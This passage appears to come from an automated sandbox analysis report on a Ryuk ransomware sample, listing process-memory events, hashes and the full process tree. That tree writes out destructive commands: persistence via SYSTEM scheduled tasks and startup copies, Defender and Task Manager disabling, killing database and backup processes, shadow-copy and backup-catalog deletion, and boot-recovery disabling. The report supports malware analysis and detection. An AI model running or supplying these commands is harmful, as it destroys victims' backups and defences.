memory of 1780 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1780 wrote to memory of 288 1780 cmd.exe schtasks.exe PID 1780 wrote to memory of 288 1780 cmd.exe schtasks.exe PID 1780 wrote to memory of 288 1780 cmd.exe schtasks.exe PID 1468 wrote to memory of 1924 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1468 wrote to memory of 1924 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1468 wrote to memory of 1924 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1924 wrote to memory of 832 1924 cmd.exe attrib.exe PID 1924 wrote to memory of 832 1924 cmd.exe attrib.exe PID 1924 wrote to memory of 832 1924 cmd.exe attrib.exe PID 1468 wrote to memory of 1672 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1468 wrote to memory of 1672 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1468 wrote to memory of 1672 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1672 wrote to memory of 1556 1672 cmd.exe attrib.exe PID 1672 wrote to memory of 1556 1672 cmd.exe attrib.exe PID 1672 wrote to memory of 1556 1672 cmd.exe attrib.exe PID 1468 wrote to memory of 1840 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1468 wrote to memory of 1840 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1468 wrote to memory of 1840 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1840 wrote to memory of 616 1840 cmd.exe cmd.exe PID 1840 wrote to memory of 616 1840 cmd.exe cmd.exe PID 1840 wrote to memory of 616 1840 cmd.exe cmd.exe PID 1468 wrote to memory of 1100 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1468 wrote to memory of 1100 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1468 wrote to memory of 1100 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1468 wrote to memory of 1392 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1468 wrote to memory of 1392 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1468 wrote to memory of 1392 1468 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe cmd.exe PID 1100 wrote to memory of 984 1100 cmd.exe reg.exe PID 1100 wrote to memory of 984 1100 cmd.exe reg.exe PID 1100 wrote to memory of 984 1100 cmd.exe reg.exe PID 1392 wrote to memory of 844 1392 cmd.exe cmd.exe -
Views/modifies file attributes 1 TTPs 3 IoCs
Processes:
attrib.exeattrib.exeattrib.exepid process 1368 attrib.exe 832 attrib.exe 1556 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe"C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe"1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
PID:1776 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵
- Drops startup file
PID:1376 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵PID:1064
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F2⤵
- Suspicious use of WriteProcessMemory
PID:296 -
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F3⤵
- Creates scheduled task(s)
PID:592 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"3⤵
- Drops startup file
- Views/modifies file attributes
PID:1368 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
PID:464 -
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
PID:1136 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /F2⤵
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /F3⤵
- Creates scheduled task(s)
PID:288 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\system32\attrib.exeattrib +h +s ryuk.exe3⤵
- Views/modifies file attributes
PID:832 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Windows\system32\attrib.exeattrib +h +s C:\ProgramData\ryuk.exe3⤵
- Views/modifies file attributes
PID:1556 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q2⤵
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Windows\system32\cmd.execmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q3⤵PID:616
-
C:\Windows\system32\icacls.exeicacls * /grant Everyone:(OI)(CI)F /T /C /Q4⤵
- Modifies file permissions
PID:2004 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1392 -
C:\Windows\system32\cmd.execmd.exe /c taskkill /t /f /im sql*3⤵PID:844
-
C:\Windows\system32\taskkill.exetaskkill /t /f /im sql*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1968 -
C:\Windows\system32\taskkill.exetaskkill /f /t /im veeam*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1096 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f3⤵PID:984
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog12⤵PID:2040
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog22⤵PID:1760
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID2⤵PID:1012
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog12⤵PID:1516
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "2⤵PID:1736
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵PID:1608
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵PID:1496
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵PID:1776
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵PID:1376
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F2⤵PID:1064
-
C:\Windows\system32\reg.exereg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F3⤵PID:332
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F2⤵PID:540
-
C:\Windows\system32\reg.exereg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F3⤵PID:1700
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit2⤵PID:1968
-
C:\Windows\system32\cmd.execmd.exe /c "C:\ProgramData\RyukReadMe.txt "3⤵PID:844
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet2⤵PID:696
-
C:\Windows\system32\cmd.execmd.exe /c vssadmin Delete Shadows /All /Quiet3⤵PID:592
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet4⤵
- Interacts with shadow copies
PID:1708 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete2⤵PID:1404
-
C:\Windows\system32\cmd.execmd.exe /c wmic shadowcopy delete3⤵PID:288
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete4⤵PID:1944
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures2⤵PID:840
-
C:\Windows\system32\cmd.execmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures3⤵PID:1620
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} boostatuspolicy ignoreallfailures4⤵
- Modifies boot configuration data using bcdedit
PID:1420 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no2⤵PID:1612
-
C:\Windows\system32\cmd.execmd.exe /c bcdedit /set {default} recoveryenabled no3⤵PID:524
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/2⤵PID:1680
-
C:\Windows\system32\cmd.execmd.exe /c wbadmin delete catalog -quiet/3⤵PID:1760
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet/4⤵
- Deletes backup catalog
PID:1728 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop avpsus /y2⤵PID:1112
-
C:\Windows\system32\net.exenet stop avpsus /y3⤵PID:772
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y2⤵PID:1512
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y1⤵PID:1164
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:1888
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no1⤵
- Modifies boot configuration data using bcdedit
PID:988
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8B
MD585a6d10468885323e5dc2549da732a02
SHA160b074142818f87396012ba26b18cf17108210f8
SHA25607cf5118df0fde1dc7a5bdbf24ae5390261749c07d0b94672e2b2c088f23057a
SHA5124ca41b64f8b91d1fffd6664c35cfab2fed5b6be0511c657efa1bde7ef15883c2d20885e083717c3b41bec651c992615a75621a78c57a375087a52d9328ca0607
-
Filesize
1KB
MD523cb6bce418d720b600fb36625cea4df
SHA18f4018131e41187445688df8cbda01119efff157
SHA2564ef805e48ac50fda04eeffff3a725481151dd1dccaf462c02105aa27f630e136
SHA51218bd24abd2d55a288933d8b1ce363e5a92703c1c25758ce3d6e52a3b3a25b00d70194fa73520f819afa0080c09866235a22c5c5785ecea2ecd1b5feca36a66b5
-
Filesize
2KB
MD54525d98c2b8f6b5d5acfc9857a6ee0a0
SHA1e1c4a28a58a0399adaf155e9d064d986160645dd
SHA25658fb788c91fe8c1224ec5f520af676fcd4cb0be2b7764da33173ded702865d63
SHA5125652016bbfea5578a91ebc6f8ae1a93b55d15ae5c2e9839c91a5f624e0923a42b70cd32ae92b19f931b41d39aed0193be0c8ea17031767a8b4c0795c9307ad49
-
Filesize
2KB
MD54525d98c2b8f6b5d5acfc9857a6ee0a0
SHA1e1c4a28a58a0399adaf155e9d064d986160645dd
SHA25658fb788c91fe8c1224ec5f520af676fcd4cb0be2b7764da33173ded702865d63
SHA5125652016bbfea5578a91ebc6f8ae1a93b55d15ae5c2e9839c91a5f624e0923a42b70cd32ae92b19f931b41d39aed0193be0c8ea17031767a8b4c0795c9307ad49
-
Filesize
292B
MD515c189b77237ef2f94a84437c8cfc21c
SHA156220c87147712076222f778b1e5e5088db0865d
SHA256e77ca6229b178b5b01e2a5d7e710449e2a9e1a60bc00025d600b9b11b842b3bd
SHA5127d6cf12cf143bf789475832fe971ea9440bf05c6eff2780a76627b4f378866f547ce78dc9550e8fe98d203b43528fedfbe7fd04a185d110ed3f75cbdd41e6de6
-
Filesize
292B
MD515c189b77237ef2f94a84437c8cfc21c
SHA156220c87147712076222f778b1e5e5088db0865d
SHA256e77ca6229b178b5b01e2a5d7e710449e2a9e1a60bc00025d600b9b11b842b3bd
SHA5127d6cf12cf143bf789475832fe971ea9440bf05c6eff2780a76627b4f378866f547ce78dc9550e8fe98d203b43528fedfbe7fd04a185d110ed3f75cbdd41e6de6
-
Filesize
885KB
MD5a57e1e6fe1c98d2e75799a46e9eb5797
SHA17878e7042c355546c118a38b90d8f7221f74d8a4
SHA2568c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe
SHA5125764f3b1971f64c9d55f387524d92038350dbdf9a7195dc7e3f7b83760d93f45e73dd4c4af6cc597add838acd2d4a4e5b7a96a3444e3c8b0369b1d487621909d
-
Filesize
8B
MD585a6d10468885323e5dc2549da732a02
SHA160b074142818f87396012ba26b18cf17108210f8
SHA25607cf5118df0fde1dc7a5bdbf24ae5390261749c07d0b94672e2b2c088f23057a
SHA5124ca41b64f8b91d1fffd6664c35cfab2fed5b6be0511c657efa1bde7ef15883c2d20885e083717c3b41bec651c992615a75621a78c57a375087a52d9328ca0607
-
Filesize
2KB
MD54525d98c2b8f6b5d5acfc9857a6ee0a0
SHA1e1c4a28a58a0399adaf155e9d064d986160645dd
SHA25658fb788c91fe8c1224ec5f520af676fcd4cb0be2b7764da33173ded702865d63
SHA5125652016bbfea5578a91ebc6f8ae1a93b55d15ae5c2e9839c91a5f624e0923a42b70cd32ae92b19f931b41d39aed0193be0c8ea17031767a8b4c0795c9307ad49
-
Filesize
292B
MD515c189b77237ef2f94a84437c8cfc21c
SHA156220c87147712076222f778b1e5e5088db0865d
SHA256e77ca6229b178b5b01e2a5d7e710449e2a9e1a60bc00025d600b9b11b842b3bd
SHA5127d6cf12cf143bf789475832fe971ea9440bf05c6eff2780a76627b4f378866f547ce78dc9550e8fe98d203b43528fedfbe7fd04a185d110ed3f75cbdd41e6de6
-
Filesize
885KB
MD5a57e1e6fe1c98d2e75799a46e9eb5797
SHA17878e7042c355546c118a38b90d8f7221f74d8a4
SHA2568c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe
SHA5125764f3b1971f64c9d55f387524d92038350dbdf9a7195dc7e3f7b83760d93f45e73dd4c4af6cc597add838acd2d4a4e5b7a96a3444e3c8b0369b1d487621909d